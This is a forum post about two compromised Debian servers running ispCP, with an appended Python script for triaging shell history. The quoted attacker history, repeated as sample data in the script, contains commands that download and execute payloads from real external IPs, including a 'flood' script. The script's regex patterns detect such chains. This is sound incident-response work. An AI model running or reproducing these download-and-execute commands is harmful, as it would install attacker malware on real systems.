Hello all, long time no post.
I had a friend call me to say he had 2 Debian servers acting funny; it turns out they were both hacked, and both servers run ISPCP.
Both servers had weird Perl scripts and httpd binaries running as user vu2000.
He is using version
ispCP 1.0.0 RC7 OMEGA
build: 20081212
Priamos
That user has no shell in the passwd file; however, the .bash_history file for that user on both boxes had this in it:
/sbin/ifconfig|grep inet
cd /dev/shm
wget http://72.167.35.180/.x/ldaudit_pcprofile.sh ; sh ldaudit_pcprofile.sh
cd /dev/shm
ls
rm -rf *
ls -al
cd /tmp
ls -a
cd .ICE-unix
ls -a
wget http://208.75.230.43/bulanul/L;tar zxvf L;rm -rf L;cd .l;./a
cd ..
rm -rf .l
wget http://208.75.230.43/bulanul/flood;perl flood;rm -rf flood
There must be an exploit somewhere...
Now I have left one box still running hacked, so as to maybe find more info to help out in case it is an exploit... so what's the next step?
Thanks...
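One concrete next step is to triage the recovered history mechanically: pull out the indicators (hosts, URLs, staging directories) and flag the fetch-and-execute chains so they can be checked against the web logs and the other box. The script below is an added example written for this thread, not code from the original post or from ispCP. The indicator patterns (FETCH_RE, EXEC_RE, etc.) and the severity scale are my own assumptions tuned to the tradecraft visible above; the sample history is the one quoted in the post, with the wrapped wget/URL pairs rejoined onto single lines.

```python
"""Triage a recovered .bash_history: flag download-and-execute chains and pull IOCs.

Added example for the thread above, not part of the original post. All patterns
and the severity scale are assumptions chosen to match the quoted history.
"""
import re
from dataclasses import dataclass, field

# Hypothetical indicator patterns (assumptions, not from any standard tool).
FETCH_RE = re.compile(r"\b(?:wget|curl|fetch|lynx)\b")                     # downloader
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)(?:sh|bash|perl|python\d?)\s+\S+"      # interpreter
                     r"|(?:^|[;&|]\s*)\./\S+")                              # ./binary
ARCHIVE_RE = re.compile(r"\btar\s+[a-z]*x")                                 # tar extract
CLEANUP_RE = re.compile(r"\brm\s+-\w*[rf]")                                 # rm -rf / -f
RECON_RE = re.compile(r"\b(?:ifconfig|uname|netstat|whoami)\b")             # host recon
HIDDEN_RE = re.compile(r"(?:^|\s)\.[A-Za-z0-9_-]+")                         # dot-dirs
STAGING_RE = re.compile(r"(?<![\w/])(/dev/shm|/var/tmp|/tmp)\b")            # world-writable
URL_RE = re.compile(r"https?://[^\s;|&]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed from the history quoted in the post (wget lines rejoined).
SAMPLE_HISTORY = """/sbin/ifconfig|grep inet
cd /dev/shm
wget http://72.167.35.180/.x/ldaudit_pcprofile.sh ; sh ldaudit_pcprofile.sh
cd /dev/shm
ls
rm -rf *
ls -al
cd /tmp
ls -a
cd .ICE-unix
ls -a
wget http://208.75.230.43/bulanul/L;tar zxvf L;rm -rf L;cd .l;./a
cd ..
rm -rf .l
wget http://208.75.230.43/bulanul/flood;perl flood;rm -rf flood
"""


@dataclass
class Finding:
    line_no: int
    command: str
    tags: list
    severity: str


@dataclass
class Triage:
    findings: list = field(default_factory=list)
    urls: set = field(default_factory=set)
    ips: set = field(default_factory=set)
    staging_dirs: set = field(default_factory=set)


def classify(cmd: str) -> list:
    """Return the behaviour tags a single command line matches, in fixed order."""
    checks = [("fetch", FETCH_RE), ("exec", EXEC_RE), ("archive", ARCHIVE_RE),
              ("cleanup", CLEANUP_RE), ("recon", RECON_RE),
              ("hidden", HIDDEN_RE), ("staging", STAGING_RE)]
    return [tag for tag, rx in checks if rx.search(cmd)]


def severity(tags: list) -> str:
    """Download immediately followed by execution is the strongest signal."""
    if "fetch" in tags and "exec" in tags:
        return "high"
    if any(t in tags for t in ("fetch", "exec", "cleanup")):
        return "medium"
    return "low" if tags else "info"


def triage_history(text: str) -> Triage:
    """Walk the history once, collecting tagged findings and raw indicators."""
    t = Triage()
    for n, raw in enumerate(text.splitlines(), 1):
        cmd = raw.strip()
        if not cmd:
            continue
        t.urls.update(URL_RE.findall(cmd))
        t.ips.update(IPV4_RE.findall(cmd))
        t.staging_dirs.update(STAGING_RE.findall(cmd))
        tags = classify(cmd)
        if tags:
            t.findings.append(Finding(n, cmd, tags, severity(tags)))
    return t


def report(t: Triage) -> str:
    """Plain-text summary: indicators first, then findings by severity."""
    lines = ["IPs: " + ", ".join(sorted(t.ips)),
             "URLs: " + ", ".join(sorted(t.urls)),
             "Staging dirs: " + ", ".join(sorted(t.staging_dirs)), ""]
    for f in sorted(t.findings, key=lambda f: ("high", "medium", "low").index(f.severity)
                    if f.severity != "info" else 3):
        lines.append(f"[{f.severity:6}] line {f.line_no}: {f.command}  ({', '.join(f.tags)})")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(triage_history(SAMPLE_HISTORY)))
```

Run it against the real file with `triage_history(open(path).read())`; the "high" findings are the three lines worth correlating first, since each names a remote host and a dropped file. The same IPs should then be grepped for in the Apache/ispCP logs and the firewall logs on the second box, which is where the initial entry vector is more likely to show up than in the attacker's own shell history.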